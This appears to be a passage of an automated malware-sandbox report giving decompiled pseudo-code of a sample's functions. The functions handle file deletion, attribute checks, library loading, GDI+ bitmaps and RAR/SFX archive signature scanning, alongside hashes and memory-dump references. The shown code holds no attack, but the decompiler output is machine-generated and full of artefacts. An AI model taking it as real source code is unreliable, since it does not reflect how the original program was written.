Opcode Fuzzy Hash: e9ac78d6c3c3a7c66fa54cb7af0a61b2e7a77494f1cedfcc018e9e1cd1c10963
Instruction Fuzzy Hash: 97F0237550934836DF11EB74FC07F993B1C9B05781F440496BA05530E2F7725A614772

Uniqueness

Uniqueness Score: -1.00%

Function 00199E18, Relevance: 3.0, APIs: 2, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00199E18(WCHAR* _a4) {
				short _v4100;
				int _t10;
				signed int _t16;
				signed int _t17;

				E001AD940();
				_push(_t16);
				_t10 = DeleteFileW(_a4); // executed
				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
				if(_t17 == 0 && E0019B32C(_a4,  &_v4100, 0x800) != 0) {
					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t17;
			}

0x00199e20
0x00199e25
0x00199e29
0x00199e31
0x00199e36
0x00199e5f
0x00199e5f
0x00199e68

APIs

DeleteFileW.KERNELBASE(?,?,?,00199648,?,?,001994A3), ref: 00199E29
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00199648,?,?,001994A3), ref: 00199E57

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: ccba4fd9958893f07107902da8696e987669b1d59e73e577c77a09a5f9d4ac1d
Instruction ID: 114986b402e03cced054eae27e24557adbef07fb339fbad4121526caf9c899b2
Opcode Fuzzy Hash: ccba4fd9958893f07107902da8696e987669b1d59e73e577c77a09a5f9d4ac1d
Instruction Fuzzy Hash: 51E092355412096BDF01DF64EC45FEA775CBB09381F884066B888C2151DB71DDE5EAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00199E7F, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00199E7F(WCHAR* _a4) {
				short _v4100;
				long _t6;
				long _t11;
				long _t13;

				E001AD940();
				_t6 = GetFileAttributesW(_a4); // executed
				_t13 = _t6;
				if(_t13 == 0xffffffff && E0019B32C(_a4,  &_v4100, 0x800) != 0) {
					_t11 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t11;
				}
				return _t13;
			}

0x00199e87
0x00199e90
0x00199e96
0x00199e9b
0x00199ebc
0x00199ec2
0x00199ec2
0x00199eca

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00199E74,?,001974F7,?,?,?,?), ref: 00199E90
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00199E74,?,001974F7,?,?,?,?), ref: 00199EBC

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 68552d62eaf99246144d93d6c423bc2972f4d15dbbaf6596797e158b06787553
Instruction ID: d22416ac3b49d9b615beb5c8e49babc6e6b1bcbcad712dfc84b54825a31b7ffd
Opcode Fuzzy Hash: 68552d62eaf99246144d93d6c423bc2972f4d15dbbaf6596797e158b06787553
Instruction Fuzzy Hash: 48E0653190011857CB10AA689C04BD97B58AB083A1F004162FD54D3191E7709D9586D0

Uniqueness

Uniqueness Score: -1.00%

Function 0019FCFD, Relevance: 3.0, APIs: 2, Instructions: 25
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0019FCFD(intOrPtr _a4) {
				short _v4100;
				struct HINSTANCE__* _t7;

				E001AD940();
				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
				if(_t7 != 0) {
					E0019B625( &_v4100, _a4,  &_v4100, 0x800);
					_t7 = LoadLibraryW( &_v4100); // executed
				}
				return _t7;
			}

0x0019fd05
0x0019fd18
0x0019fd20
0x0019fd2e
0x0019fd3a
0x0019fd3a
0x0019fd44

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0019FD18
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0019E7F6,Crypt32.dll,?,0019E878,?,0019E85C,?,?,?,?), ref: 0019FD3A

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 7047c69ef3100db3c4c4b146424296281964826532a820cb97176b9adf316b69
Instruction ID: 3ea9e42db8a5544ca3afce5db1ccb6119a76f55472cf2cc601929e27039fe308
Opcode Fuzzy Hash: 7047c69ef3100db3c4c4b146424296281964826532a820cb97176b9adf316b69
Instruction Fuzzy Hash: B0E0127690011CABDB119A959C09FEA77ACEF09391F4400A6B948D2005DB74E990CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 001A938E, Relevance: 3.0, APIs: 2, Instructions: 24
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E001A938E(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0x1c3398;
				if(_a8 == 0) {
					L001AD80E(); // executed
				} else {
					L001AD814();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}

0x001a9391
0x001a9393
0x001a9395
0x001a9398
0x001a939b
0x001a93a3
0x001a93a4
0x001a93a7
0x001a93ad
0x001a93b6
0x001a93af
0x001a93af
0x001a93af
0x001a93bb
0x001a93c1
0x001a93ca

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 001A93AF
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 001A93B6

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 642d5afd81a5305c2d705c2e20ffb692ca5cc1b5936f41fd0131d37c079edcc0
Instruction ID: 4117429e9857eec65eb7579659f062e58a79fa8bbae10daf7fa88d655871a8d1
Opcode Fuzzy Hash: 642d5afd81a5305c2d705c2e20ffb692ca5cc1b5936f41fd0131d37c079edcc0
Instruction Fuzzy Hash: E7E06D75801318EBCB20DFA9D501B99B7F8EF05320F10805EE84593600D770AE449BA1

Uniqueness

Uniqueness Score: -1.00%

Function 001A9B08, Relevance: 3.0, APIs: 2, Instructions: 22
comCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001A9B08(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t7;
				void* _t11;
				intOrPtr _t14;

				 *[fs:0x0] = _t14;
				_t5 =  *0x1d75c0; // 0x73f5c100
				 *((intOrPtr*)( *_t5 + 8))(_t5, _t11,  *[fs:0x0], E001C1161, 0xffffffff);
				L001AD826(); // executed
				_t7 =  *0x1cdff0( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t7;
			}

0x001a9b19
0x001a9b20
0x001a9b2b
0x001a9b31
0x001a9b36
0x001a9b3f
0x001a9b4a

APIs

GdiplusShutdown.GDIPLUS(?,?,?,001C1161,000000FF), ref: 001A9B31
OleUninitialize.OLE32(?,?,?,001C1161,000000FF), ref: 001A9B36

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 27effc16e88757cbfe45bb8435662a682f791c8df5dccb33acc436e8697aaec2
Instruction ID: c4c32f66c1e5221ee283c15d0d2c7e09fdd5b5ae3a9037ba7db833a1128e0f6d
Opcode Fuzzy Hash: 27effc16e88757cbfe45bb8435662a682f791c8df5dccb33acc436e8697aaec2
Instruction Fuzzy Hash: 55E01236544A449FC710DB48EC45F55B7E8F709B20F044769F51A83B50DB356800CAD1

Uniqueness

Uniqueness Score: -1.00%

Function 001B1726, Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E001B1726(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t9;

				_t1 = E001B281A(__eflags, E001B166A); // executed
				 *0x1cd680 = _t1;
				if(_t1 != 0xffffffff) {
					_t2 = E001B28C8(__eflags, _t1, 0x1f01dc);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E001B1759(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x001b172b
0x001b1730
0x001b1739
0x001b1744
0x001b174a
0x001b174b
0x001b174d
0x001b1758
0x001b174f
0x001b174f
0x00000000
0x001b174f
0x001b173b
0x001b173b
0x001b173d
0x001b173d

APIs

Part of subcall function 001B281A: try_get_function.LIBVCRUNTIME ref: 001B282F

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001B1744
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 001B174F

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 8f20d9cbda472da96a5fd04d0bb0924aad315f7fa61255d8e76f1195a8224874
Instruction ID: 3a5155d0ecb6ce30aa744fb29fdb33e95fcd280599672ade05ca919c2d83d673
Opcode Fuzzy Hash: 8f20d9cbda472da96a5fd04d0bb0924aad315f7fa61255d8e76f1195a8224874
Instruction Fuzzy Hash: 10D0C965A58705389E047A7478739D93B8899227713F24A66F020CB4C2EF74804BA525

Uniqueness

Uniqueness Score: -1.00%

Function 001912B2, Relevance: 3.0, APIs: 2, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001912B2(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}

0x001912b9
0x001912ce
0x001912d4

APIs

GetDlgItem.USER32(?,?), ref: 001912C7
ShowWindow.USER32(00000000), ref: 001912CE

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: c4b223e0b321e5dc1b6a616b51a5878ba7a375307ad2ea285ba796131002df9b
Instruction ID: 9279d2ed5079dfcf773700f1831ca29b03c516fa691a33584cdb6fd258e02ff0
Opcode Fuzzy Hash: c4b223e0b321e5dc1b6a616b51a5878ba7a375307ad2ea285ba796131002df9b
Instruction Fuzzy Hash: 4DC01272058200BECB011BB0EC09D2EBFA8BBA4612F04C92CB0A6C08A0C238C090DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00191973, Relevance: 1.8, APIs: 1, Instructions: 285
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00191973(intOrPtr* __ecx, intOrPtr __edx) {
				signed int _t106;
				intOrPtr _t109;
				signed int _t110;
				signed int _t112;
				signed int _t116;
				signed int _t119;
				signed int _t127;
				intOrPtr _t128;
				char _t129;
				char _t138;
				intOrPtr _t143;
				signed int _t144;
				signed int _t145;
				void* _t147;
				signed int _t152;
				signed int _t153;
				signed int _t155;
				void* _t159;
				void* _t160;
				signed int _t166;
				intOrPtr* _t169;
				signed int _t175;
				void* _t176;
				signed int _t178;
				char* _t190;
				intOrPtr _t191;
				intOrPtr _t197;
				intOrPtr* _t199;
				signed int _t202;
				void* _t204;
				char* _t205;
				intOrPtr _t206;
				void* _t207;

				_t197 = __edx;
				_t169 = __ecx;
				E001AD870(E001C1451, _t207);
				_t199 = _t169;
				_push(7);
				_t164 = _t199 + 0x21f8;
				_push(_t199 + 0x21f8);
				 *((char*)(_t199 + 0x6cbc)) = 0;
				 *((char*)(_t199 + 0x6cc4)) = 0;
				if( *((intOrPtr*)( *_t199 + 0xc))() == 7) {
					 *(_t199 + 0x6cc0) =  *(_t199 + 0x6cc0) & 0x00000000;
					_t106 = E00191D09(_t164, 7);
					__eflags = _t106;
					if(_t106 == 0) {
						E00196ED7(_t207 - 0x38, 0x200000);
						 *(_t207 - 4) =  *(_t207 - 4) & 0x00000000;
						_t109 =  *((intOrPtr*)( *_t199 + 0x14))();
						_t197 =  *_t199;
						 *((intOrPtr*)(_t207 - 0x18)) = _t109;
						_t110 =  *((intOrPtr*)(_t197 + 0xc))( *((intOrPtr*)(_t207 - 0x38)),  *((intOrPtr*)(_t207 - 0x34)) + 0xfffffff0);
						_t175 = _t110;
						_t202 = 0;
						 *(_t207 - 0x14) = _t175;
						_t166 = 1;
						__eflags = _t175;
						if(_t175 <= 0) {
							L22:
							__eflags =  *(_t199 + 0x6cc0);
							_t176 = _t207 - 0x38;
							if( *(_t199 + 0x6cc0) != 0) {
								_t37 = _t207 - 4; // executed
								 *_t37 =  *(_t207 - 4) | 0xffffffff;
								__eflags =  *_t37;
								E0019159C(_t176); // executed
								L25:
								_t112 =  *(_t199 + 0x6cb0);
								__eflags = _t112 - 4;
								if(__eflags != 0) {
									__eflags = _t112 - 3;
									if(_t112 != 3) {
										 *((intOrPtr*)(_t199 + 0x2200)) = 7;
										L32:
										 *((char*)(_t207 - 0xd)) = 0;
										__eflags = E0019391A(_t199, _t197);
										 *(_t207 - 0xe) = 0;
										__eflags = 0 - 1;
										if(0 != 1) {
											L38:
											_t116 =  *((intOrPtr*)(_t207 - 0xd));
											L39:
											_t178 =  *((intOrPtr*)(_t199 + 0x6cc5));
											__eflags = _t178;
											if(_t178 == 0) {
												L41:
												__eflags =  *((char*)(_t199 + 0x6cc4));
												if( *((char*)(_t199 + 0x6cc4)) != 0) {
													L43:
													__eflags = _t178;
													if(__eflags == 0) {
														E0019134C(__eflags, 0x1b, _t199 + 0x1e);
													}
													__eflags =  *((char*)(_t207 + 8));
													if( *((char*)(_t207 + 8)) != 0) {
														L48:
														__eflags =  *(_t207 - 0xe);
														 *((char*)(_t199 + 0x6cb6)) =  *((intOrPtr*)(_t199 + 0x2224));
														if( *(_t207 - 0xe) == 0) {
															L69:
															__eflags =  *((char*)(_t199 + 0x6cb5));
															if( *((char*)(_t199 + 0x6cb5)) == 0) {
																L71:
																E0019FAB1(_t199 + 0x6cfa, _t199 + 0x1e, 0x800);
																L72:
																_t119 = _t166;
																goto L73;
															}
															__eflags =  *((char*)(_t199 + 0x6cb9));
															if( *((char*)(_t199 + 0x6cb9)) == 0) {
																goto L72;
															}
															goto L71;
														}
														__eflags =  *((char*)(_t199 + 0x21e0));
														if( *((char*)(_t199 + 0x21e0)) == 0) {
															L51:
															_t204 =  *((intOrPtr*)( *_t199 + 0x14))();
															 *((intOrPtr*)(_t207 - 0x24)) = _t197;
															 *((intOrPtr*)(_t207 + 8)) =  *((intOrPtr*)(_t199 + 0x6ca0));
															 *((intOrPtr*)(_t207 - 0x18)) =  *((intOrPtr*)(_t199 + 0x6ca4));
															 *(_t207 - 0x14) =  *(_t199 + 0x6ca8);
															 *((intOrPtr*)(_t207 - 0x1c)) =  *((intOrPtr*)(_t199 + 0x6cac));
															 *((intOrPtr*)(_t207 - 0x20)) =  *((intOrPtr*)(_t199 + 0x21dc));
															while(1) {
																_t127 = E0019391A(_t199, _t197);
																__eflags = _t127;
																if(_t127 == 0) {
																	break;
																}
																_t128 =  *((intOrPtr*)(_t199 + 0x21dc));
																__eflags = _t128 - 3;
																if(_t128 != 3) {
																	__eflags = _t128 - 2;
																	if(_t128 == 2) {
																		__eflags =  *((char*)(_t199 + 0x6cb5));
																		if( *((char*)(_t199 + 0x6cb5)) == 0) {
																			L66:
																			_t129 = 0;
																			__eflags = 0;
																			L67:
																			 *((char*)(_t199 + 0x6cb9)) = _t129;
																			L68:
																			 *((intOrPtr*)(_t199 + 0x6ca0)) =  *((intOrPtr*)(_t207 + 8));
																			 *((intOrPtr*)(_t199 + 0x6ca4)) =  *((intOrPtr*)(_t207 - 0x18));
																			 *(_t199 + 0x6ca8) =  *(_t207 - 0x14);
																			 *((intOrPtr*)(_t199 + 0x6cac)) =  *((intOrPtr*)(_t207 - 0x1c));
																			 *((intOrPtr*)(_t199 + 0x21dc)) =  *((intOrPtr*)(_t207 - 0x20));
																			 *((intOrPtr*)( *_t199 + 0x10))(_t204,  *((intOrPtr*)(_t207 - 0x24)), 0);
																			goto L69;
																		}
																		__eflags =  *((char*)(_t199 + 0x3318));
																		if( *((char*)(_t199 + 0x3318)) != 0) {
																			goto L66;
																		}
																		_t129 = _t166;
																		goto L67;
																	}
																	__eflags = _t128 - 5;
																	if(_t128 == 5) {
																		goto L68;
																	}
																	L60:
																	E00191E3B(_t199);
																	continue;
																}
																__eflags =  *((char*)(_t199 + 0x6cb5));
																if( *((char*)(_t199 + 0x6cb5)) == 0) {
																	L56:
																	_t138 = 0;
																	__eflags = 0;
																	L57:
																	 *((char*)(_t199 + 0x6cb9)) = _t138;
																	goto L60;
																}
																__eflags =  *((char*)(_t199 + 0x5668));
																if( *((char*)(_t199 + 0x5668)) != 0) {
																	goto L56;
																}
																_t138 = _t166;
																goto L57;
															}
															goto L68;
														}
														__eflags =  *((char*)(_t199 + 0x6cbc));
														if( *((char*)(_t199 + 0x6cbc)) != 0) {
															goto L69;
														}
														goto L51;
													} else {
														L46:
														_t119 = 0;
														L73:
														L74:
														 *[fs:0x0] =  *((intOrPtr*)(_t207 - 0xc));
														return _t119;
													}
												}
												__eflags = _t116;
												if(_t116 != 0) {
													goto L48;
												}
												goto L43;
											}
											__eflags =  *((char*)(_t207 + 8));
											if( *((char*)(_t207 + 8)) == 0) {
												goto L46;
											}
											goto L41;
										}
										__eflags = 0;
										 *((char*)(_t207 - 0xd)) = 0;
										while(1) {
											E00191E3B(_t199);
											_t143 =  *((intOrPtr*)(_t199 + 0x21dc));
											__eflags = _t143 - _t166;
											if(_t143 == _t166) {
												break;
											}
											__eflags =  *((char*)(_t199 + 0x21e0));
											if( *((char*)(_t199 + 0x21e0)) == 0) {
												L37:
												_t144 = E0019391A(_t199, _t197);
												__eflags = _t144;
												_t145 = _t144 & 0xffffff00 | _t144 != 0x00000000;
												 *(_t207 - 0xe) = _t145;
												__eflags = _t145 - 1;
												if(_t145 == 1) {
													continue;
												}
												goto L38;
											}
											__eflags = _t143 - 4;
											if(_t143 == 4) {
												break;
											}
											goto L37;
										}
										_t116 = _t166;
										goto L39;
									}
									_t205 = _t199 + 0x21ff;
									_t147 =  *((intOrPtr*)( *_t199 + 0xc))(_t205, _t166);
									__eflags = _t147 - _t166;
									if(_t147 != _t166) {
										goto L46;
									}
									__eflags =  *_t205;
									if( *_t205 != 0) {
										goto L46;
									}
									 *((intOrPtr*)(_t199 + 0x2200)) = 8;
									goto L32;
								}
								E0019134C(__eflags, 0x3c, _t199 + 0x1e);
								goto L46;
							}
							E0019159C(_t176);
							goto L46;
						} else {
							goto L6;
						}
						do {
							L6:
							_t190 =  *((intOrPtr*)(_t207 - 0x38)) + _t202;
							__eflags =  *_t190 - 0x52;
							if( *_t190 != 0x52) {
								goto L17;
							}
							_t152 = E00191D09(_t190, _t110 - _t202);
							__eflags = _t152;
							if(_t152 == 0) {
								L16:
								_t110 =  *(_t207 - 0x14);
								goto L17;
							}
							_t191 =  *((intOrPtr*)(_t207 - 0x18));
							 *(_t199 + 0x6cb0) = _t152;
							__eflags = _t152 - _t166;
							if(_t152 != _t166) {
								L19:
								_t197 =  *_t199;
								_t153 = _t202 + _t191;
								 *(_t199 + 0x6cc0) = _t153;
								 *((intOrPtr*)(_t197 + 0x10))(_t153, 0, 0);
								_t155 =  *(_t199 + 0x6cb0);
								__eflags = _t155 - 2;
								if(_t155 == 2) {
									L21:
									 *((intOrPtr*)( *_t199 + 0xc))(_t199 + 0x21f8, 7);
									goto L22;
								}
								__eflags = _t155 - 3;
								if(_t155 != 3) {
									goto L22;
								}
								goto L21;
							}
							__eflags = _t202;
							if(_t202 <= 0) {
								goto L19;
							}
							__eflags = _t191 - 0x1c;
							if(_t191 >= 0x1c) {
								goto L19;
							}
							__eflags =  *(_t207 - 0x14) - 0x1f;
							if( *(_t207 - 0x14) <= 0x1f) {
								goto L19;
							}
							_t159 =  *((intOrPtr*)(_t207 - 0x38)) - _t191;
							__eflags =  *((char*)(_t159 + 0x1c)) - 0x52;
							if( *((char*)(_t159 + 0x1c)) != 0x52) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1d)) - 0x53;
							if( *((char*)(_t159 + 0x1d)) != 0x53) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1e)) - 0x46;
							if( *((char*)(_t159 + 0x1e)) != 0x46) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1f)) - 0x58;
							if( *((char*)(_t159 + 0x1f)) == 0x58) {
								goto L19;
							}
							goto L16;
							L17:
							_t202 = _t202 + 1;
							__eflags = _t202 - _t110;
						} while (_t202 < _t110);
						goto L22;
					}
					 *(_t199 + 0x6cb0) = _t106;
					_t166 = 1;
					__eflags = _t106 - 1;
					if(_t106 == 1) {
						_t206 =  *_t199;
						_t160 =  *((intOrPtr*)(_t206 + 0x14))(0);
						asm("sbb edx, 0x0");
						 *((intOrPtr*)(_t206 + 0x10))(_t160 - 7, _t197);
					}
					goto L25;
				}
				_t119 = 0;
				goto L74;
			}

0x00191973
0x00191973
0x00191978
0x00191982
0x00191984
0x00191988
0x0019198e
0x0019198f
0x00191996
0x001919a3
0x001919ac
0x001919b7
0x001919bc
0x001919be
0x001919f4
0x001919fd
0x00191a01
0x00191a07
0x00191a12
0x00191a15
0x00191a1a
0x00191a1c
0x00191a1e
0x00191a21
0x00191a22
0x00191a24
0x00191ab9
0x00191ab9
0x00191ac0
0x00191ac3
0x00191acf
0x00191acf
0x00191acf
0x00191ad3
0x00191ad8
0x00191ad8
0x00191ade
0x00191ae1
0x00191af3
0x00191af6
0x00191b24
0x00191b2e
0x00191b32
0x00191b3a
0x00191b3f
0x00191b42
0x00191b44
0x00191b7d
0x00191b7d
0x00191b80
0x00191b80
0x00191b86
0x00191b88
0x00191b90
0x00191b90
0x00191b97
0x00191b9d
0x00191b9d
0x00191b9f
0x00191ba7
0x00191ba7
0x00191bac
0x00191bb0
0x00191bbd
0x00191bbd
0x00191bc7
0x00191bcd
0x00191cc5
0x00191cc5
0x00191ccc
0x00191cd7
0x00191ce7
0x00191cec
0x00191cec
0x00000000
0x00191cec
0x00191cce
0x00191cd5
0x00000000
0x00000000
0x00000000
0x00191cd5
0x00191bd3
0x00191bda
0x00191be9
0x00191bf0
0x00191bf2
0x00191bfb
0x00191c04
0x00191c0d
0x00191c16
0x00191c1f
0x00191c60
0x00191c62
0x00191c67
0x00191c69
0x00000000
0x00000000
0x00191c24
0x00191c2a
0x00191c2d
0x00191c4f
0x00191c52
0x00191c6d
0x00191c74
0x00191c83
0x00191c83
0x00191c83
0x00191c85
0x00191c85
0x00191c8b
0x00191c90
0x00191c99
0x00191ca2
0x00191cab
0x00191cb9
0x00191cc2
0x00000000
0x00191cc2
0x00191c76
0x00191c7d
0x00000000
0x00000000
0x00191c7f
0x00000000
0x00191c7f
0x00191c54
0x00191c57
0x00000000
0x00000000
0x00191c59
0x00191c5b
0x00000000
0x00191c5b
0x00191c2f
0x00191c36
0x00191c45
0x00191c45
0x00191c45
0x00191c47
0x00191c47
0x00000000
0x00191c47
0x00191c38
0x00191c3f
0x00000000
0x00000000
0x00191c41
0x00000000
0x00191c41
0x00000000
0x00191c6b
0x00191bdc
0x00191be3
0x00000000
0x00000000
0x00000000
0x00191bb2
0x00191bb2
0x00191bb2
0x00191cee
0x00191cef
0x00191cf4
0x00191cfe
0x00191cfe
0x00191bb0
0x00191b99
0x00191b9b
0x00000000
0x00000000
0x00000000
0x00191b9b
0x00191b8a
0x00191b8e
0x00000000
0x00000000
0x00000000
0x00191b8e
0x00191b46
0x00191b48
0x00191b4b
0x00191b4d
0x00191b52
0x00191b58
0x00191b5a
0x00000000
0x00000000
0x00191b5c
0x00191b63
0x00191b6a
0x00191b6c
0x00191b71
0x00191b73
0x00191b76
0x00191b79
0x00191b7b
0x00000000
0x00000000
0x00000000
0x00191b7b
0x00191b65
0x00191b68
0x00000000
0x00000000
0x00000000
0x00191b68
0x00191bb9
0x00000000
0x00191bb9
0x00191afa
0x00191b04
0x00191b07
0x00191b09
0x00000000
0x00000000
0x00191b0f
0x00191b12
0x00000000
0x00000000
0x00191b18
0x00000000
0x00191b18
0x00191ae9
0x00000000
0x00191ae9
0x00191ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x00191a2a
0x00191a2a
0x00191a2d
0x00191a2f
0x00191a32
0x00000000
0x00000000
0x00191a38
0x00191a3d
0x00191a3f
0x00191a7a
0x00191a7a
0x00000000
0x00191a7a
0x00191a41
0x00191a44
0x00191a4a
0x00191a4c
0x00191a84
0x00191a84
0x00191a86
0x00191a90
0x00191a96
0x00191a99
0x00191a9f
0x00191aa2
0x00191aa9
0x00191ab6
0x00000000
0x00191ab6
0x00191aa4
0x00191aa7
0x00000000
0x00000000
0x00000000
0x00191aa7
0x00191a4e
0x00191a50
0x00000000
0x00000000
0x00191a52
0x00191a55
0x00000000
0x00000000
0x00191a57
0x00191a5b
0x00000000
0x00000000
0x00191a60
0x00191a62
0x00191a66
0x00000000
0x00000000
0x00191a68
0x00191a6c
0x00000000
0x00000000
0x00191a6e
0x00191a72
0x00000000
0x00000000
0x00191a74
0x00191a78
0x00000000
0x00000000
0x00000000
0x00191a7d
0x00191a7d
0x00191a7e
0x00191a7e
0x00000000
0x00191a82
0x001919c2
0x001919c8
0x001919c9
0x001919cb
0x001919d1
0x001919d7
0x001919df
0x001919e4
0x001919e4
0x00000000
0x001919cb
0x001919a5
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00191978

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
